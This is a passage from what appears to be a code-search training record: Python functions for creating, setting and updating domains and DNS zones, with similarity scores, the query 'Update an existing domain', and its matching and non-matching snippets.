extra.get(\"DYN\") or 1\n else:\n dyn = 1\n params = {\"DOMAIN\": domain, \"TYPE\": _type}\n action = \"/api_dns_new_domain.asp\"\n if self.reseller_id is not None:\n params[\"DYN\"] = dyn\n action = \"/api_dns_new_domain_reseller.asp\"\n self.connection.request(action, params=params)\n zone = self.get_zone(domain)\n if ttl is not None:\n zone = self.update_zone(zone, zone.domain, ttl=ttl)\n return zone", "def create_or_show_domain(name):\n manager = get_manager()\n domain_id = manager.resolve_domain_id(name)\n if domain_id:\n log(\"Domain '%s' already exists.\" % name, level=DEBUG)\n else:\n manager.create_domain(domain_name=name,\n description='Created by Juju')\n log(\"Created new domain: %s\" % name, level=DEBUG)\n domain_id = manager.resolve_domain_id(name)\n return domain_id", "def domain_create(self, domain, contact_info, raw=True, **kwargs):\n endpoint = '/Domain/Create'\n\n params = {\n 'Domain' : domain\n }\n\n params.update(contact_info)\n params.update(kwargs)\n\n response = self.__perform_get_request(endpoint, params)\n\n if response.status_code == 200:\n parsed_response = response.json()\n if raw:\n return parsed_response\n else:\n return parsed_response['product'][0]['status'] == 'SUCCESS'", "def create_all(self):\n for name in self.app.config['SIMPLE_DOMAINS']:\n self.connection.create_domain(name)", "def create_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:\n pass", "def domain(self, domain):", "def test_create_domain_with_a_record(self):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n a_record = [{\n \"type\": \"A\",\n \"name\": \"ftp.example.com\",\n \"data\": \"192.0.2.8\",\n \"ttl\": 3600\n }]\n t['Resources']['domain']['Properties']['records'] = a_record\n instance = self._setup_test_cloud_dns_instance('dnsinstance_create', t)\n create_args = self._get_create_args_with_comments(a_record)\n self._stubout_create(instance, fake_dns_instance, **create_args)\n scheduler.TaskRunner(instance.create)()\n self.assertEqual((instance.CREATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def setup_domains():\n sdb = boto.connect_sdb()\n sdb.create_domain(\"mls_domain\")", "def create_type_A_domain(self, domain, point_to):\n r53 = self.connections.get_route53()\n # Get Zone ID\n zone = r53.get_zone(self.env_domain)\n zone_id = zone.id", "def CreateDomain(self, body_DomainPurchase):\n body_DomainPurchase._check_essential()\n\n response = self.client.http_post(\"/v4/domains\", body=json.dumps(body_DomainPurchase))\n return parse_response(response, DomainPurchaseResult)", "def Fcp_Create(domain_name,lun_interval):\n\n host1 = api.hosts.list()[0]\n storage_ = host1.storage.list()\n fcp_storage = params.Storage(type_='fcp',\n volume_group=params.VolumeGroup())\n SD = params.StorageDomain(name=domain_name,format='True',\n host=host1,type_='data',storage_format='v3')\n storage_len = len(storage_)\n Lun_list = list()\n for x in range (0,storage_len):\n try:\n if storage_[x].get_type() == None:\n Lun_list.append(storage_[x].get_logical_unit()[0])\n if storage_[x].get_type() == 'nfs':\n raise Exception('nfs?')\n if storage_[x].get_type() == 'glusterfs':\n raise Exception('gluster?')\n except Exception,e:\n print \"caught\", e\n continue\n try:\n if len(Lun_list) == 0:\n raise Exception('operation stopped, no Fc Luns')\n except Exception,e:\n print e\n return\n else:\n fcp_storage.set_logical_unit(Lun_list[lun_interval[0]:\n lun_interval[1]])\n SD.set_storage(fcp_storage)\n try:\n NewSd = api.storagedomains.add(SD)\n except Exception,e:\n print \"A problem caught during creating the domain --->\",e\n return\n api.datacenters.list()[0].storagedomains.add(NewSd)", "def _create_entity_in_domain(entity_type, domain_id):\n if entity_type == 'users':\n new_entity = unit.new_user_ref(domain_id=domain_id)\n new_entity = self.identity_api.create_user(new_entity)\n elif entity_type == 'groups':\n new_entity = unit.new_group_ref(domain_id=domain_id)\n new_entity = self.identity_api.create_group(new_entity)\n elif entity_type == 'roles':\n new_entity = self._create_role(domain_id=domain_id)\n else:\n # Must be a bad test plan\n raise exception.NotImplemented()\n return new_entity", "def pre_domain_create(self, resource_dict):\n pass", "def create_zone(self, domain, type=\"master\", ttl=None, extra=None):\n params = {\"name\": domain}\n try:\n params[\"ip_address\"] = extra[\"ip\"]\n except Exception:\n params[\"ip_address\"] = \"127.0.0.1\"\n\n res = self.connection.request(\"/v2/domains\", data=json.dumps(params), method=\"POST\")\n\n return Zone(\n id=res.object[\"domain\"][\"name\"],\n domain=res.object[\"domain\"][\"name\"],\n type=\"master\",\n ttl=1800,\n driver=self,\n extra={},\n )", "def perform_create(self, serializer):\n instance = serializer.save(\n domain=self.org_safe_get(self.request.user, self.kwargs.get('pk')))", "def test_create_email_domain_twice(self):\n email_dom = 'twins.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n domain.create(email_dom)\n self.assertRaises(error.AlreadyExists, domain.create, email_dom)\n domain.delete(email_dom)", "def add(self, newaddress):\n list = newaddress.split(\"@\")\n newdomain = list[-1]\n if not newdomain in self.__domainlist:\n self.__domainlist.append(newdomain)\n else:\n print(\"Domain is already in the database\")", "def test_create_domain_with_mx_record(self):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n mx_record = [{\n \"type\": \"MX\",\n \"name\": \"example.com\",\n \"data\": \"mail.example.com\",\n \"priority\": 5,\n \"ttl\": 3600\n }]\n t['Resources']['domain']['Properties']['records'] = mx_record\n instance = self._setup_test_cloud_dns_instance('dnsinstance_create', t)\n create_args = self._get_create_args_with_comments(mx_record)\n self._stubout_create(instance, fake_dns_instance, **create_args)\n scheduler.TaskRunner(instance.create)()\n self.assertEqual((instance.CREATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def _adddomain(self, domain: Domain):\n\n domain = copy.deepcopy(domain)\n if self.model is not None:\n # Check that model and domain are compatible\n self._validate_model_domain(self.model, domain)\n\n # Add in domain\n self.domain = domain\n\n # Setup base namelists\n self._set_base_namelists()\n else:\n self.domain = domain", "def create_physical_domain(self, physical_domain_name, vlan_pool_dn):\n DomP_mo = DomP('uni/', physical_domain_name)\n self.commit(DomP_mo)\n if vlan_pool_dn is not None:\n RsVlanNs_mo = RsVlanNs(DomP_mo.dn)\n RsVlanNs_mo.tDn = vlan_pool_dn\n self.commit(RsVlanNs_mo)\n return DomP_mo", "def create_site(apps, schema_editor):\n return site_models.Site.objects.create(\n name='The SATNet Network',\n domain='localhost:8000'\n )", "def create_tenant(name, domain):\n manager = get_manager()\n tenant = manager.resolve_tenant_id(name, domain=domain)\n if not tenant:\n manager.create_tenant(tenant_name=name,\n domain=domain,\n description='Created by Juju')\n log(\"Created new tenant '%s' in domain '%s'\" % (name, domain),\n level=DEBUG)\n return\n\n log(\"Tenant '%s' already exists.\" % name, level=DEBUG)", "def _domain(self):\n if self.__domain is None:\n self.__domain = Domain(\n definition='Need domain definition?',\n updatable='False',\n optional='False',\n )\n self._ident[self._domain_name] = self.__domain\n self._data_record.domain_ids = [self._domain_name,]\n return self.__domain", "def __init__(__self__, *,\n domain: pulumi.Input[str]):\n pulumi.set(__self__, \"domain\", domain)", "def __init__(__self__, *,\n domain: pulumi.Input[str]):\n pulumi.set(__self__, \"domain\", domain)", "def generate_domainname():\n domainname = ''.join(generate_string(10, valid_domain_name_chars))\n domain = random.choice(['com', 'co.il', 'info'])\n return domainname+'.'+domain", "def save(\n server_context: ServerContext,\n schema_name: str,\n query_name: str,\n domain: Domain,\n container_path: str = None,\n options: Dict = None,\n) -> any:\n url = server_context.build_url(\"property\", \"saveDomain.api\", container_path=container_path)\n payload = {\n \"domainDesign\": domain.to_json(),\n \"queryName\": query_name,\n \"schemaName\": schema_name,\n }\n\n if options is not None:\n payload[\"options\"] = options\n\n return server_context.make_request(url, json=payload)", "def test_dos_create_service_domain_list(self):\n # create a huge list of domain\n self.reset_defaults()\n for k in range(1, 30000):\n self.domain_list.append({\"domain\": \"w.t%s.com\" % k})\n\n # send MAX_ATTEMPTS requests\n for k in range(1, self.MAX_ATTEMPTS):\n self.service_name = str(uuid.uuid1())\n self.check_one_request()", "def create():", "def create():", "def generate_domain(domain):\n\n if domain.lower() in (\"greenland\", \"gris\", \"gris_ext\"):\n pism_exec = \"pismr\"\n elif domain.lower() in (\"og\"):\n pism_exec = \"pismr -no_model_strip 0 -calving_wrap_around\"\n elif domain.lower() in (\"hia\"):\n x_min = -652200.0\n x_max = -232600.0\n y_min = -1263900.0\n y_max = -943500.0\n pism_exec = \"\"\"pismr -x_range {x_min},{x_max} -y_range {y_min},{y_max} -bootstrap\"\"\".format(\n x_min=x_min, x_max=x_max, y_min=y_min, y_max=y_max\n )\n elif domain.lower() in (\"jakobshavn\", \"jib\"):\n x_min = -280000.0\n x_max = 320000.0\n y_min = -2410000.0\n y_max = -2020000.0\n pism_exec = \"\"\"pismr -regional -x_range {x_min},{x_max} -y_range {y_min},{y_max} -bootstrap -regional.zero_gradient true -regional.no_model_strip 4.5\"\"\".format(\n x_min=x_min, x_max=x_max, y_min=y_min, y_max=y_max\n )\n else:\n print((\"Domain {} not recognized, exiting\".format(domain)))\n import sys\n\n sys.exit(0)\n\n return pism_exec", "def CreateProxyGroupDomain(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"CreateProxyGroupDomain\", params, headers=headers)\n response = json.loads(body)\n model = models.CreateProxyGroupDomainResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def setNodeDNSDomain(self,node,domain):\n post_data = {'search': str(domain)}\n data = self.connect('put',\"nodes/%s/dns\" % (node), post_data)\n return data", "def test_delete_email_domain(self):\n email_dom = 'delete.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n domain.create(email_dom)\n self.assertTrue(domain.delete(email_dom))", "def create_hosted_zone(self, domain_name, caller_ref=None, comment=''):\r\n if caller_ref is None:\r\n caller_ref = str(uuid.uuid4())\r\n params = {'name' : domain_name,\r\n 'caller_ref' : caller_ref,\r\n 'comment' : comment,\r\n 'xmlns' : self.XMLNameSpace}\r\n xml = HZXML % params\r\n uri = '/%s/hostedzone' % self.Version\r\n response = self.make_request('POST', uri,\r\n {'Content-Type' : 'text/xml'}, xml)\r\n body = response.read()\r\n boto.log.debug(body)\r\n if response.status == 201:\r\n e = boto.jsonresponse.Element(list_marker='NameServers',\r\n item_marker=('NameServer',))\r\n h = boto.jsonresponse.XmlHandler(e, None)\r\n h.parse(body)\r\n return e\r\n else:\r\n raise exception.DNSServerError(response.status,\r\n response.reason,\r\n body)", "def create_domain_name(self, name):\n return (\"%s.%s.%s\" % (name, \"net\", self.domain)).lower()", "def create_user_domain():\n for host in online_hosts:\n with settings(warn_only=True):\n\n result1 = sudo(\"racadm -r \"+host+\" -u root -p \"+PASSWORD+\" config -g cfgUserDomain -o cfgUserDomainName <Domain Name> -i 1\")\n if result1.failed:\n logging.error(\"Host: [ \"+host+\" ] : \" + \"Configuration for UserDomainName failed \")\n\n result2 = sudo(\"racadm -r \"+host+\" -u root -p \"+PASSWORD+\" config -g cfgActiveDirectory -o cfgADDomainController1 <Domain Name>\")\n if result2.failed:\n logging.error(\"Host: [ \"+host+\" ] : \" + \"Configuration for DomainController1 failed \")\n\n result3 = sudo(\"racadm -r \"+host+\" -u root -p \"+PASSWORD+\" config -g cfgActiveDirectory -o cfgADGlobalCatalog1 <Domain Name>\")\n if result3.failed:\n logging.error(\"Host: [ \"+host+\" ] : \" + \"Configuration for GlobalCatalog1 failed \")", "def GetCreateAdminDomain(identifier, namespace=None):\n return pynt.xmlns.GetCreateRDFObject(identifier=identifier, namespace=namespace, klass=AdminDomain)", "def set_domain_path(self):\n\n self.domain_path = os.path.join(self.docs_path, self.domain)\n if not os.path.exists(self.domain_path):\n os.makedirs(self.domain_path)", "def test_invalid_email_domain_input(self):\n email_dom = '*.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n self.assertRaises(error.InputError, domain.create, email_dom)", "def create(subdomain, subject_type_or_type_name, subject_name, author):\n return Subject(key_name='%s:%s' % (subdomain, subject_name),\n type=get_name(subject_type_or_type_name), author=author)", "def domain(self, domain):\n self._domain = domain", "def domain(self, domain):\n self._domain = domain", "def delete_domain(DomainName=None):\n pass", "def create(cls, subdomain, key, **kwargs):\n key_name = subdomain + ':' + key\n return cls(key_name=key_name, subdomain=subdomain, **kwargs)", "def create_dir(self, domain):\n domain_dir = self.get_domaindir(domain)\n if not os.path.exists(domain_dir):\n os.makedirs(domain_dir)\n\n for dir in DOMAIN_DIRS:\n dir_ = domain_dir + \"/\" + dir\n if not os.path.exists(dir_):\n os.makedirs(dir_)", "def Run(self, args):\n project = properties.VALUES.core.project.Get(required=True)\n zone = {}\n zone['dnsName'] = args.dns_name\n zone['name'] = args.zone\n zone['description'] = args.description\n\n really = console_io.PromptContinue('Creating %s in %s' % (zone, project))\n if not really:\n return\n\n dns = self.context['dns']\n request = dns.managedZones().create(project=project, body=zone)\n try:\n result = request.execute()\n return result\n except errors.HttpError as error:\n raise exceptions.HttpException(util.GetError(error))\n except errors.Error as error:\n raise exceptions.ToolException(error)", "def set_domain(domain):\n set_hosts(domain)\n click.echo(\n 'Host file was set: {} -> 127.0.0.1'.format(', '.join(domain))\n )", "def insert_domain_page(page,domain_id):\r\n db = connect()\r\n cursor = db.cursor()\r\n sql_string = \"INSERT INTO domain_pages(domain_id, page_url) VALUES(%s, %s)\"\r\n try:\r\n cursor.execute(sql_string, (int(domain_id[0]), page))\r\n db.commit()\r\n except:\r\n cursor.close()\r\n raise RuntimeError(\"An Exception happened with the Database, make sure you are connected\")\r\n cursor.close()\r\n db.close()", "def test_create(self):\n xml = \"\"\"<domain></domain>\"\"\"\n expected = \"\"\"<domain><name>foo</name><uuid>foo</uuid><devices /></domain>\"\"\"\n hypervisor = mock.Mock()\n hypervisor.listNetworks.return_value = []\n with mock.patch('see.context.resources.lxc.open', mock.mock_open(read_data=xml), create=True):\n lxc.domain_create(hypervisor, 'foo', {'configuration': '/foo'})\n results = hypervisor.defineXML.call_args_list[0][0][0]\n self.assertEqual(results, expected, compare(results, expected))", "def testDomainMappingCreateVerifiedDomain(self):\n\n with mock.patch(\n 'googlecloudsdk.api_lib.run.global_methods.GetServerlessClientInstance',\n return_value=self.mock_serverless_client):\n verified_domains = [\n self.mock_serverless_client.MESSAGES_MODULE.AuthorizedDomain(\n id='www.example.com')\n ]\n with mock.patch(\n 'googlecloudsdk.api_lib.run.global_methods.ListVerifiedDomains',\n return_value=verified_domains):\n self.Run('run domain-mappings create '\n '--service myapp --domain www.example.com')\n\n self.operations.CreateDomainMapping.assert_called_once_with(\n self.domain_ref, 'myapp', [self.launch_stage_changes], False)\n self.AssertOutputContains(\n \"\"\"NAME RECORD TYPE CONTENTS\n myapp A 216.239.32.21\"\"\",\n normalize_space=True)", "def create():\n pass", "def add_subdomain(self, subdomain):\n\n return self.subdomain(self.domainname, subdomain).create()", "def __init__(__self__, *,\n domain_name: str,\n type: str):\n pulumi.set(__self__, \"domain_name\", domain_name)\n pulumi.set(__self__, \"type\", type)", "def addSubdomain(self, name):\n reply = self.rpc.addSubdomain(self.username,\n self.password,\n self.domain,\n name)\n if reply != \"OK\":\n raise Exception(\"RPC returned error: \" + reply)", "def m_create_identity(DID, domain_name, website, commercial_name, parent_node_account, password, overwrite):\n\n error, didDoc = create_identity(\n DID, domain_name, website, commercial_name, parent_node_account, password, overwrite)\n if error is not None:\n print(error)\n\n print(f\"Created\")", "def create(site):\n\n # Make sure the site name is all lowercased,\n # with no spaces. Yesod requires that.\n if not Utilities.is_word(site):\n Utilities.log(\"Site names must contain letters and numbers only,\")\n Utilities.log(\"with no spaces, dashes, or underscores.\")\n Utilities.log(\"Please choose a valid site name.\")\n exit(1)\n\n # Create the site.\n Yesod.create(site)", "def domain(self, domain):\n\n self._domain = domain", "def domain(self, domain):\n\n self._domain = domain", "def setup_domain_for_droplet(self, droplet, name):\n domain = self.manager.get_domain(self.domain)\n domain.load()\n droplet.load()\n domain.create_new_domain_record(type=\"A\", name=\"%s.net\" % name,\n data=droplet.ip_address)", "def AddActiveDirectoryDomain(parser):\n help_text = (\n 'Managed Service for Microsoft Active Directory domain this instance is '\n 'joined to. Only available for SQL Server instances.'\n )\n parser.add_argument('--active-directory-domain', help=help_text)", "def _create_project(self):\n request = {\n \"project\": {\n \"description\": \"description\",\n \"enabled\": True,\n \"name\": uuid.uuid4().hex,\n \"domain_id\": \"default\",\n }\n }\n response = self.client.post(PROJECT_PATH, data=json.dumps(request),\n headers=HEADERS)\n\n if response.status_code == 201:\n return response.json()\n else:\n raise SystemExit(\"Failed to create project.\")", "def fastlydomain(args):\n pprint(api.domain(service_id, args[0], args[1]).attrs)", "def _update_domains_on_server_create(self, server):\n ns_rec_content = self._sanitize_content(\"NS\", server['name'])\n\n LOG.debug(\"Content field of newly created NS records for \"\n \"existing domains upon server create is: %s\"\n % ns_rec_content)\n\n query_select = select([\n models.Domain.__table__.c.id,\n \"'%s'\" % self._sanitize_uuid_str(server['id']),\n models.Domain.__table__.c.name,\n \"'NS'\",\n \"'%s'\" % ns_rec_content,\n 1,\n 1]\n )\n\n columns = [\n models.Record.__table__.c.domain_id,\n models.Record.__table__.c.designate_id,\n models.Record.__table__.c.name,\n models.Record.__table__.c.type,\n models.Record.__table__.c.content,\n models.Record.__table__.c.auth,\n models.Record.__table__.c.inherit_ttl,\n ]\n\n query = InsertFromSelect(models.Record.__table__, query_select,\n columns)\n\n # Execute the manually prepared query\n # A TX is required for, at the least, SQLite.\n try:\n self.session.begin()\n self.session.execute(query)\n except Exception:\n with excutils.save_and_reraise_exception():\n self.session.rollback()\n else:\n self.session.commit()", "def add(self, domain, header, record_type, data, ttl=300, priority=5):\n return request(\n API_LIST.DNS_ADD.value,\n {\n 'email': self.email,\n 'token': self.token,\n 'domain': domain,\n 'header': header,\n 'type': record_type,\n 'data': data,\n 'ttl': ttl,\n 'priority': priority\n }\n )", "def create_zone(self, domain, type=\"master\", ttl=None, extra=None):\n\n id = \"id-%s\" % (domain)\n\n if id in self._zones:\n raise ZoneAlreadyExistsError(zone_id=id, value=None, driver=self)\n\n zone = Zone(id=id, domain=domain, type=type, ttl=ttl, extra={}, driver=self)\n self._zones[id] = {\"zone\": zone, \"records\": {}}\n return zone", "async def test_domain(self, dm):\n request = create_request(\"domain\", \"other\")\n result = await dm.apply_handler(request, create_responder(request))\n assert result.dialogue_state == \"domain\"", "def add_subdomain_output(self,filename,ll_x,ll_y, ur_x, ur_y,start,stop,step,area_id = 0): \n \n self.number_of_subdomains += 1\n self.subdomains.number_of_subdomains = self.number_of_subdomains #set the 'number_of_subdomains' attribute \n name = 'subdomain' + str(self.number_of_subdomains) \n self.subdomainGroups.append(self.subdomains.createGroup(name) ) #great a new subdomain Group\n \n self.subdomainGroups[self.number_of_subdomains-1].filename = filename #set the bounds attributes for the subdomain\n\n self.subdomainGroups[self.number_of_subdomains-1].ll_x = ll_x #set the bounds attributes for the subdomain\n self.subdomainGroups[self.number_of_subdomains-1].ll_y = ll_y\n self.subdomainGroups[self.number_of_subdomains-1].ur_x = ur_x\n self.subdomainGroups[self.number_of_subdomains-1].ur_y = ur_y\n self.subdomainGroups[self.number_of_subdomains-1].start = start\n self.subdomainGroups[self.number_of_subdomains-1].stop = stop\n self.subdomainGroups[self.number_of_subdomains-1].step = step\n self.subdomainGroups[self.number_of_subdomains-1].area_id = area_id", "async def setjradd(self, ctx, domain):\n allowedDomains = await self.config.guild(ctx.guild).allowedDomains()\n allowedDomains.append(domain)\n await self.config.guild(ctx.guild).allowedDomains.set(allowedDomains)\n await ctx.message.add_reaction(\"✅\")", "def _perform(self, domain, validation_name, validation):\n\n domain_name = self._metaname_domain_name_for_hostname(validation_name)\n try:\n response = self._metaname_client().request(\n \"create_dns_record\",\n domain_name,\n self._txt_record(f\"{validation_name}.\", validation),\n )\n except Exception as e:\n raise errors.PluginError(\n f\"Unable to create an acme-challenge record in the zone {domain}: {e}\"\n ) from e\n else:\n self.created_record_reference = response", "def test_domain(self):\n self.assertEqual(self.gmail_case.domain, 'google.com')\n self.gmail_case.domain = 'yahoo.com'\n self.assertEqual(self.gmail_case.domain, 'yahoo.com')\n self.assertEqual(self.sld_case.domain, 'amazon.co.uk')\n self.assertEqual(self.gmail_case.tld, 'com')\n self.assertEqual(self.sld_case.tld, 'co.uk')\n self.gmail_case.tld = 'co.ke'\n self.sld_case.tld = 'gov'\n self.assertEqual(self.gmail_case.tld, 'co.ke')\n self.assertEqual(self.sld_case.tld, 'gov')\n self.assertEqual(self.gmail_case.domain, 'yahoo.co.ke')\n self.assertEqual(self.sld_case.domain, 'amazon.gov')", "def test_domain_ctnr(self):\n self.c1.domains.add(Domain.objects.get(name='oregonstate.edu'))\n\n c2 = Ctnr.objects.create(name='test_ctnr2')\n c2.ranges.add(self.r)\n\n self.create_ptr(\n ip_str='128.193.0.2', fqdn='foo1.oregonstate.edu',\n ip_type='4', ctnr=self.c1)\n self.create_ptr(\n ip_str='128.193.0.3', fqdn='foo2.oregonstate.edu',\n ip_type='4', ctnr=c2)", "def save_domain(self):\n del_domain = 0\n save_domain = 0\n\n sending_btn = self.dlg.sender().objectName()\n if sending_btn[:-1] == \"uBtnRemoveDomain\":\n del_domain = sending_btn[-1]\n if sending_btn[:-1] == \"uBtnSaveDomain\":\n save_domain = sending_btn[-1]\n\n keys = {}\n for entry in range(1, len(self.domains) + 2):\n if int(del_domain) == entry:\n continue\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(entry)).text()\n key = getattr(self.dlg, \"uTextAPIKey{0}\".format(entry)).text().strip()\n if domain and key:\n keys[domain] = key\n self.api_key_instance.set_api_keys(keys)\n\n # remove store capability docs for the removed or add domain/key\n # if they already exits .i.e these will be reloaded\n if save_domain:\n ui_elem_num = save_domain\n else:\n ui_elem_num = del_domain\n\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(ui_elem_num)).text()\n self.local_store.del_domains_xml(domain)\n\n # load / Reload service data\n self.load_settings()\n self.dlg.uWarningSettings.hide()\n self.dlg.uLabelWarning.hide()\n if self.curr_list_wid_index is not None:\n self.dlg.uListOptions.setCurrentItem(self.curr_list_wid_index)\n else:\n self.dlg.uListOptions.setCurrentRow(0)\n\n self.dlg.uStackedWidget.setCurrentIndex(0)\n self.services_loaded = False # key change, load data again\n self.load_ui()", "def domain(self, value):\n if hasattr(self, \"_domain\"):\n raise ValueError(\"A ServerName's domain cannot be changed.\")\n if value is None:\n raise ValueError(\"A ServerName must be given a domain.\")\n if not isinstance(value, str):\n raise TypeError(\"The domain must be a string, not %s.\" % (type(value)))\n if value is \"\":\n raise ValueError(\"A empty string is not a valid domain.\")\n self._domain = value", "def company():\n\n company = Company.objects.create(name='Tre G.M.B.H.', country='Germany')\n return company", "def create(self):\n\t\treturn handle_to_object(call_sdk_function('PrlSrv_Create'))", "def domain(self, domain=None):\n\n return self.domain_class(apiobj=self, domainname=domain)" ]
[ "0.85276437", "0.7999616", "0.7635129", "0.7572509", "0.745609", "0.7389668", "0.73356265", "0.7306637", "0.72217894", "0.72094274", "0.71779686", "0.71715486", "0.7072683", "0.70593244", "0.7049416", "0.7021447", "0.70118153", "0.6965163", "0.6953879", "0.68060184", "0.67575157", "0.67476666", "0.67468023", "0.6722885", "0.6698058", "0.6688507", "0.66364205", "0.6568596", "0.6449279", "0.6405425", "0.6376646", "0.63315713", "0.6312915", "0.62846965", "0.61674", "0.6166814", "0.6166336", "0.61001366", "0.6097927", "0.60204047", "0.60056305", "0.5947531", "0.5947079", "0.594154", "0.59373116", "0.58956856", "0.58902884", "0.58902884", "0.5887031", "0.5841805", "0.5831175", "0.5776316", "0.5776316", "0.5769221", "0.5767488", "0.57672507", "0.5762473", "0.57524043", "0.5715049", "0.56886864", "0.56805927", "0.5673255", "0.5667465", "0.56514907", "0.5650661", "0.5650661", "0.5635848", "0.5630922", "0.56305766", "0.56246585", "0.5621423", "0.5613649", "0.5600299", "0.5577198", "0.5559958", "0.5542713", "0.55354655", "0.5527555", "0.5504028", "0.5492911", "0.5483442", "0.5483442", "0.54790556", "0.54720384", "0.5471931", "0.54578704", "0.5448646", "0.5442973", "0.5436437", "0.54332775", "0.5432362", "0.5427165", "0.54200053", "0.54197365", "0.5418946", "0.54151136", "0.5414429", "0.53811395", "0.5359927", "0.5359237" ]
0.743728
5
Update an existing domain
def update(domain_id, name, sensitive): domain = get(domain_id) domain.name = name domain.sensitive = sensitive database.update(domain)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def edit_domain(domain_name):\n\n if request.method == \"POST\":\n domain = session.query(Domain).filter(\n Domain.domain_name == domain_name).first()\n\n # Check if domain.provider object exists to make sure\n # duplicate Provider.provider_url is not created\n provider = session.query(Provider).filter(\n Provider.provider_url == domain.provider.provider_url).first()\n if not provider:\n provider = Provider(\n provider_url=request.form[\"provider-url\"].strip())\n\n domain.category.category_name = session.query(CategoryName).filter(\n CategoryName.name == request.form[\"category\"].strip()).first()\n\n domain.domain_name = parse_url(request.form[\"domain-name\"].strip())\n domain.ip = request.form[\"ip-address\"].strip()\n domain.provider.provider_url = parse_url(\n provider.provider_url.strip())\n domain.is_active = request.form.get(\"is-active\", False)\n domain.is_monitored = request.form.get(\"is-monitored\", False)\n\n # Convert date string from form to date object\n exp_date = datetime.strptime(request.form.get(\"exp-date\"),\n \"%Y-%m-%d\").date()\n domain.exp_date = exp_date\n\n session.add(domain)\n\n try:\n session.commit()\n message = \"{}Success!{} Updated {}{}{} successfully.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"success\")\n except:\n session.rollback()\n message = \"{}Error!{} Problem with one of the fields.\".format(\n \"<strong>\", \"</strong>\")\n flash(message, \"danger\")\n return redirect(url_for(\"edit_domain\", domain_name=domain_name))\n\n if request.form[\"submit\"] == \"Save\":\n return redirect(url_for(\"view_domain\",\n domain_name=domain.domain_name,\n category_names=category_names))\n else:\n return redirect(url_for(\"edit_domain\",\n domain_name=domain.domain_name,\n category_names=category_names))\n else:\n domain = session.query(Domain).filter(\n Domain.domain_name == domain_name).first()\n\n # Obtain list of domain names without tuple to use\n # for domain_pager()\n domain_names = [d.domain_name for d in session.query(\n Domain.domain_name).order_by(Domain.domain_name).all()]\n next_domain, previous_domain = domain_pager(domain_name, domain_names)\n\n kwargs = {\n \"domain\": domain,\n \"domain_name\": domain_name,\n \"category_names\": category_names,\n \"next_domain\": next_domain,\n \"previous_domain\": previous_domain\n }\n return render_template(\"edit_domain.html\", **kwargs)", "def update_domain():\n\n for e in Expr.search() + User.search(): e.set_tld(config.server_name)", "def test_update_domain_only(self):\n self.test_update()", "def update_domain (cls, base, updated, log):\n # Get new domain name\n domain = cls.detect_domains(nffg=updated)\n if len(domain) == 0:\n log.error(\"No domain detected in new %s!\" % updated)\n return\n if len(domain) > 1:\n log.warning(\"Multiple domain name detected in new %s!\" % updated)\n return\n domain = domain.pop()\n log.debug(\"Update elements of domain: %s in %s...\" % (domain, base.id))\n base_infras = {i.id for i in base.infras if i.domain == domain}\n if len(base_infras) == 0:\n log.warning(\"No Node was found in the base %s! Use merging...\" % base)\n return cls.merge_new_domain(base=base, nffg=updated, log=log)\n # If infra nodes were removed or added, best way is to remerge domain\n else:\n # TODO - implement real update\n log.error(\"Domain update has not implemented yet!\")", "def set_domain(self, domain):\n\n self._domain = domain\n\n self.changed = True", "def post_domain_update(self, resource_id, resource_dict):\n pass", "def change_the_Domain_for_ad_domain_and_click_Save(driver, ad_domain):\n global domain\n domain = ad_domain\n assert wait_on_element(driver, 5, '//input[@ix-auto=\"input__Domain\"]')\n # driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain\"]').clear()\n # driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain\"]').send_keys(ad_domain)\n assert wait_on_element(driver, 7, '//button[@ix-auto=\"button__SAVE\"]', 'clickable')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__SAVE\"]').click()", "def ModifyDomain(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"ModifyDomain\", params, headers=headers)\n response = json.loads(body)\n model = models.ModifyDomainResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def domain_update(self, domain, contact_info, raw=True, **kwargs):\n endpoint = '/Domain/Update'\n\n params = {\n 'Domain' : domain\n }\n\n params.update(contact_info)\n params.update(kwargs)\n\n response = self.__perform_get_request(endpoint, params)\n\n if response.status_code == 200:\n parsed_response = response.json()\n if raw:\n return parsed_response\n else:\n return parsed_response['product'][0]['status'] == 'SUCCESS'", "def setNodeDNSDomain(self,node,domain):\n post_data = {'search': str(domain)}\n data = self.connect('put',\"nodes/%s/dns\" % (node), post_data)\n return data", "def replace_domain(address, old_domain, new_domain):\n old_domain_pattern = r'' + old_domain + '$'\n address = re.sub(old_domain_pattern, new_domain, address)\n return address", "def update(request):\n from pprint import pformat\n if 'ipv4' not in request.GET and 'ipv6' not in request.GET:\n return HttpResponse(\"Must specify one or both of ipv4/ipv6 address\\nParams:%s\" % pformat(request.GET.dict()), status=400)\n if not u'domain' in request.GET:\n return HttpResponse(\"Must specify domain\\nParams:%s\" % pformat(request.GET.dict()), status=400)\n\n for ipvx, record_type in ((u'ipv4', 'A'), (u'ipv6', 'AAAA')):\n if ipvx not in request.GET:\n continue\n record, created = Record.objects.get_or_create(\n name=request.GET['domain'],\n type=record_type,\n )\n record.domain_id = 1\n record.ttl = 1\n record.auth = True\n record.content = request.GET[ipvx]\n record.save()\n\n return HttpResponse(\"Saved record(s)\")", "def set_keystone_v3_domain(self, **kwargs):\n LOG_OBJ.debug(\"Creating the domain.\")\n\n _url = \"http://\" + self.host_ip 